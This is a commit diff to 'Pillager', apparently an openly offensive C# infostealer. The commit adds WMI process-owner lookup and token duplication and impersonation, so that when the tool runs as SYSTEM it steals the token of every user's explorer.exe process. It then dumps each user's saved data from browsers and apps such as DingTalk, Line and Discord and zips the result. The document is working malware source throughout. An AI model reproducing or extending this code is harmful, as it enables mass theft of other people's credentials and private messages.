update

2024-02-12 10:57:06 +08:00 · 2024-02-12 10:57:06 +08:00 · ec6e84d537
parent 01a23b98bf
commit ec6e84d537
4 changed files with 83 additions and 12 deletions
--- a/Pillager/Helper/Methods.cs
+++ b/Pillager/Helper/Methods.cs
@ -1,4 +1,6 @@
-using System.IO;
+using System;
+using System.IO;
+using System.Management;

 namespace Pillager.Helper
 {
@ -39,5 +41,41 @@ namespace Pillager.Helper
                }
            }
        }
+
+        public static string GetProcessUserName(int pID)
+        {
+            string text1 = null;
+            SelectQuery query1 = new SelectQuery("Select * from Win32_Process WHERE processID=" + pID);
+            ManagementObjectSearcher searcher1 = new ManagementObjectSearcher(query1);
+            try
+            {
+                foreach (ManagementObject disk in searcher1.Get())
+                {
+                    ManagementBaseObject inPar = null;
+                    ManagementBaseObject outPar = null;
+                    inPar = disk.GetMethodParameters("GetOwner");
+                    outPar = disk.InvokeMethod("GetOwner", inPar, null);
+                    text1 = outPar["User"].ToString();
+                    break;
+                }
+            }
+            catch
+            {
+                text1 = "SYSTEM";
+            }
+            return text1;
+        }
+
+        public static bool ImpersonateProcessToken(int pid)
+        {
+            IntPtr hProcess = Native.OpenProcess(Native.PROCESS_ACCESS_FLAGS.PROCESS_QUERY_INFORMATION, true, pid);
+            if (hProcess == IntPtr.Zero) return false;
+            IntPtr hToken;
+            if (!Native.OpenProcessToken(hProcess, 0x00000002 | 0x00000004, out hToken)) return false;
+            IntPtr DuplicatedToken = new IntPtr();
+            if (!Native.DuplicateToken(hToken, 2, ref DuplicatedToken)) return false;
+            if (!Native.SetThreadToken(IntPtr.Zero, DuplicatedToken)) return false;
+            return true;
+        }
    }
 }
--- a/Pillager/Helper/Native.cs
+++ b/Pillager/Helper/Native.cs
@ -7,6 +7,15 @@ namespace Pillager.Helper
 {
    public static class Native
    {
+        [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        public static extern bool RevertToSelf();
+        [DllImport("advapi32.dll", SetLastError = true)]
+        [return: MarshalAs(UnmanagedType.Bool)]
+        public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);
+        [DllImport("advapi32.dll")]
+        public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle);
+        [DllImport("advapi32.dll", SetLastError = true)]
+        public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
        [DllImport("kernel32", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
--- a/Pillager/Pillager.csproj
+++ b/Pillager/Pillager.csproj
@ -35,6 +35,7 @@
  <ItemGroup>
    <Reference Include="System" />
    <Reference Include="System.Drawing" />
+    <Reference Include="System.Management" />
    <Reference Include="System.Security" />
    <Reference Include="System.Data" />
    <Reference Include="System.Windows.Forms" />
--- a/Pillager/Program.cs
+++ b/Pillager/Program.cs
@ -1,4 +1,6 @@
-using System.IO;
+using System;
+using System.Diagnostics;
+using System.IO;
 using Pillager.Browsers;
 using Pillager.FTPs;
 using Pillager.Helper;
@ -20,6 +22,37 @@ namespace Pillager
            if (File.Exists(savezippath)) File.Delete(savezippath);
            Directory.CreateDirectory(savepath);

+            if (Environment.UserName.ToLower() == "system")
+            {
+                foreach (Process p in Process.GetProcesses())
+                {
+                    if (p.ProcessName.ToLower() == "explorer" && Methods.ImpersonateProcessToken(p.Id))
+                    {
+                        string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p.Id));
+                        Directory.CreateDirectory(usersavepath);
+                        SaveAll(usersavepath);
+                        Native.RevertToSelf();
+                    }
+                }
+            }
+            else
+            {
+                SaveAll(savepath);
+            }
+
+            //Zip
+            ZipStorer zip = ZipStorer.Create(savezippath);
+            foreach (var item in Directory.GetDirectories(savepath))
+                zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
+            foreach (var item in Directory.GetFiles(savepath))
+                zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
+            zip.Close();
+
+            Directory.Delete(savepath, true);
+        }
+
+        static void SaveAll(string savepath)
+        {
            //Browsers
            IE.Save(savepath);
            OldSogou.Save(savepath);//SogouExplorer < 12.x
@ -65,16 +98,6 @@ namespace Pillager
            DingTalk.Save(savepath);
            Line.Save(savepath);
            Discord.Save(savepath);
-
-            //Zip
-            ZipStorer zip = ZipStorer.Create(savezippath);
-            foreach (var item in Directory.GetDirectories(savepath))
-                zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
-            foreach (var item in Directory.GetFiles(savepath))
-                zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
-            zip.Close();
-
-           Directory.Delete(savepath, true);
        }
    }
 }